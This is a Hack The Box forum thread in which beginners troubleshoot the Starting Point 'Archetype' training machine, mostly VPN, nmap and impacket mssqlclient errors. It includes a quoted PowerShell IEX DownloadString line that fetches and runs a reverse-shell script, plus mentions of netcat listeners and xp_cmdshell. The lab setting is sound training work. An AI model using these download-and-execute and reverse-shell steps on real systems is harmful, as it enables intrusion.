Starting Point [HTB]

@deathstalker01 said:
its been hours and i am stuck at this error plz help i tried both the slashes forward and backword with ARCHETYPE butstill the same result i removed python tried python3 in the command but same result with some more errors

root@kali:~/impacket/examples# python mssqlclient.py ARCHETYPE\sql_svc@10.10.10.27 -windows-auth
Impacket v0.9.22.dev1+20200416.91838.62162e0a - Copyright 2020 SecureAuth Corporation

Password:
Traceback (most recent call last):
File “mssqlclient.py”, line 173, in
ms_sql.connect()
File “/usr/local/lib/python2.7/dist-packages/impacket-0.9.22.dev1+20200416.91838.62162e0a-py2.7.egg/impacket/tds.py”, line 532, in connect
sock.connect(sa)
File “/usr/lib/python2.7/socket.py”, line 228, in meth
return getattr(self._sock,name)(*args)
socket.error: [Errno 113] No route to host

“No route to host”
There could be a problem with your VPN connection or a temporary issue on the remote server( firewall issue maybe or router issue?)
Try resetting your Openvpn connection,try also EU server openvpn connection ( if you are using the USA) or USA opevpn ( if you are using the EU one)
Also you could try as first step in tshooting to just ping the remote host to see kif there is basic connectivity

removed

hi, i am new in hack the box .

After running nmap, i get the following error.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 13:09 EDT
Error #487: Your port specifications are illegal. Example of proper form: “-100,200-1024,T:3000-4000,U:60000-”
QUITTING!

please give me any solution.

Type your comment> @McL0vin said:

@deathstalker01 said:
its been hours and i am stuck at this error plz help i tried both the slashes forward and backword with ARCHETYPE butstill the same result i removed python tried python3 in the command but same result with some more errors

root@kali:~/impacket/examples# python mssqlclient.py ARCHETYPE\sql_svc@10.10.10.27 -windows-auth
Impacket v0.9.22.dev1+20200416.91838.62162e0a - Copyright 2020 SecureAuth Corporation

Password:
Traceback (most recent call last):
File “mssqlclient.py”, line 173, in
ms_sql.connect()
File “/usr/local/lib/python2.7/dist-packages/impacket-0.9.22.dev1+20200416.91838.62162e0a-py2.7.egg/impacket/tds.py”, line 532, in connect
sock.connect(sa)
File “/usr/lib/python2.7/socket.py”, line 228, in meth
return getattr(self._sock,name)(*args)
socket.error: [Errno 113] No route to host

“No route to host”
There could be a problem with your VPN connection or a temporary issue on the remote server( firewall issue maybe or router issue?)
Try resetting your Openvpn connection,try also EU server openvpn connection ( if you are using the USA) or USA opevpn ( if you are using the EU one)
Also you could try as first step in tshooting to just ping the remote host to see kif there is basic connectivity

i tried connecting to different vpn my ifconfig command shows the tun0 interface hackthebox access shows I’m connected and in the cli it show initialization complete …i think i am connected properly the issue is something else maybe with impacket i really dont know and o still cant find any solution
i tried ping on the target 10.10.10.27 - it says host unreachable
but when i try ping on some other htb active machine it works

Type your comment> @Swas231 said:

hi, i am new in hack the box .

After running nmap, i get the following error.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 13:09 EDT
Error #487: Your port specifications are illegal. Example of proper form: “-100,200-1024,T:3000-4000,U:60000-”
QUITTING!

please give me any solution.

Hey man, I would suggest writing your own Nmap command. Write a command that basically scans services on all ports. Dm if you need a nudge

Rooted! After dabbling with 1/2 boxes for months, Starting Point has been amazing for beginners like myself. Too good!

Type your comment> @Sharvantg said:

Type your comment> @sabukabu said:

I’m stuck around the same area.

I have made a file called shell.ps1 with the code verbatim of the example inside.

I start up my web server, get netcat listening and get the ufw callbacks but i get an error when I try to run:

I think because the example is using IP 10.10.14.3 and i didnt change to be my IP but honestly im just copy/pasting at this point so dunno…

help?

Hey, I’m stuck here too. Have you figured what the problem was?
This is my output.

Exception calling “DownloadString” with “1” argument(s): “Unable to connect to the remote server”

At line:1 char:1

  • IEX (New-Object Net.WebClient).DownloadString("http://10.0.2.15/shell

  • 
      + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException      
    
      + FullyQualifiedErrorId : WebException             
    
    
    

I was stuck here also. I determined that you need to:

  1. Determine what the ipaddr (inet addr) is for tun0.
  2. Use that ip to replace 10.10.14.3 in both shell.ps1 and the example xpcmdshell script.

Type your comment

Those who can’t ping 10.10.10.27 or/and get Error #487: Your port specifications are illegal. Example of proper form: “-100,200-1024,T:3000-4000,U:60000-” you should first make sure that your vpn connection pack is from the starting point section Login :: Hack The Box :: Penetration Testing Labs. If connection pack is taken from Access section it WILL NOT work. Once you get the VPN for starting point up and running you should be able to ping and get a ports list

Can anyone help what vm network configuration i should run on, the nmap on ip works just fine on host ubuntu but doesnt in vm kali. Hence i dont get any values to fill in variable PORTS

@squirrelcop I use NAT. Try it or a network bridge.
Does you VM have internet access? Can you ping 10.10.10.27?
If you can’t ping it probably you are on the wrong VPN or VPN doesn’t work. If VPN works it should print “Initialization Sequence Completed” in the end of logs

Type your comment> @RobotK said:

Those who can’t ping 10.10.10.27 or/and get Error #487: Your port specifications are illegal. Example of proper form: “-100,200-1024,T:3000-4000,U:60000-” you should first make sure that your vpn connection pack is from the starting point section Login :: Hack The Box :: Penetration Testing Labs. If connection pack is taken from Access section it WILL NOT work. Once you get the VPN for starting point up and running you should be able to ping and get a ports list

use nmap -sC -sV -Pn -p-$ports 10.10.10.27

Type your comment> @RobotK said:

@squirrelcop I use NAT. Try it or a network bridge.
Does you VM have internet access? Can you ping 10.10.10.27?
If you can’t ping it probably you are on the wrong VPN or VPN doesn’t work. If VPN works it should print “Initialization Sequence Completed” in the end of logs

I use NAT, tried it with network bridge too, when i type ping 10.10.10.27 nothing happens(like actually nothing shows up)

“Initialization Sequence Completed” shows when i use the vpn too. This problem shows up only when i use kali vm when i’m on my host ubuntu i can ping 10.10.10.27 just fine.

I’m having the invalid sequence issue, using kali in virtualbox, I can ping the ip address just fine

kali@kali:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:1f:30:76 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
       valid_lft 84620sec preferred_lft 84620sec
    inet6 fe80::a00:27ff:fe1f:3076/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 100
    link/none
    inet 10.10.14.96/23 brd 10.10.15.255 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 dead:beef:2::105e/64 scope global
       valid_lft forever preferred_lft forever
    inet6 fe80::edc1:e98f:e338:3d9a/64 scope link stable-privacy
       valid_lft forever preferred_lft forever
kali@kali:~$ ping 10.10.14.96
PING 10.10.14.96 (10.10.14.96) 56(84) bytes of data.
64 bytes from 10.10.14.96: icmp_seq=1 ttl=64 time=0.023 ms
64 bytes from 10.10.14.96: icmp_seq=2 ttl=64 time=0.038 ms
64 bytes from 10.10.14.96: icmp_seq=3 ttl=64 time=0.065 ms
64 bytes from 10.10.14.96: icmp_seq=4 ttl=64 time=0.158 ms
64 bytes from 10.10.14.96: icmp_seq=5 ttl=64 time=0.036 ms
64 bytes from 10.10.14.96: icmp_seq=6 ttl=64 time=0.042 ms
64 bytes from 10.10.14.96: icmp_seq=7 ttl=64 time=0.034 ms
^C
--- 10.10.14.96 ping statistics ---
7 packets transmitted, 7 received, 0% packet loss, time 6299ms
rtt min/avg/max/mdev = 0.023/0.056/0.158/0.043 ms
kali@kali:~$ ports=$(nmap -p- --min-rate=1000 -T4 10.10.14.96 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
kali@kali:~$ nmap -sC -sV --verbose -p$ports 10.10.14.96
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-06 22:06 EDT
Error #487: Your port specifications are illegal.  Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
QUITTING!

Reading this thread seems i need to use the ip from ifconfig, not necessary 10.10.10.27, which this was explained in the tutorial.

Any idea what’s going wrong? how to debug this?

[Edit] looks like nmap found nothing? all ports are closed?

kali@kali:~$ nmap -p- --min-rate=1000 -T4 10.10.14.96
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-06 23:08 EDT
Nmap scan report for 10.10.14.96
Host is up (0.000090s latency).
All 65535 scanned ports on 10.10.14.96 are closed

Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds

Type your comment

Hello,

 I'm stuck on the foothold part of Starting Point.  How do you connect to the sql server?  mssqlclient command is not working for me

Type your comment

it just says mssqlclient.py command not found?
Im using the newest version of Kali Linux

@ekowibowo, no you should nmap 10.10.10.27.
10.10.14.96 - it’s your IP, you will need to use it when getting reverse shell

@Razzberry you just need install it GitHub - SecureAuthCorp/impacket: Impacket is a collection of Python classes for working with netw it includes many tool and mssqlclient.py as well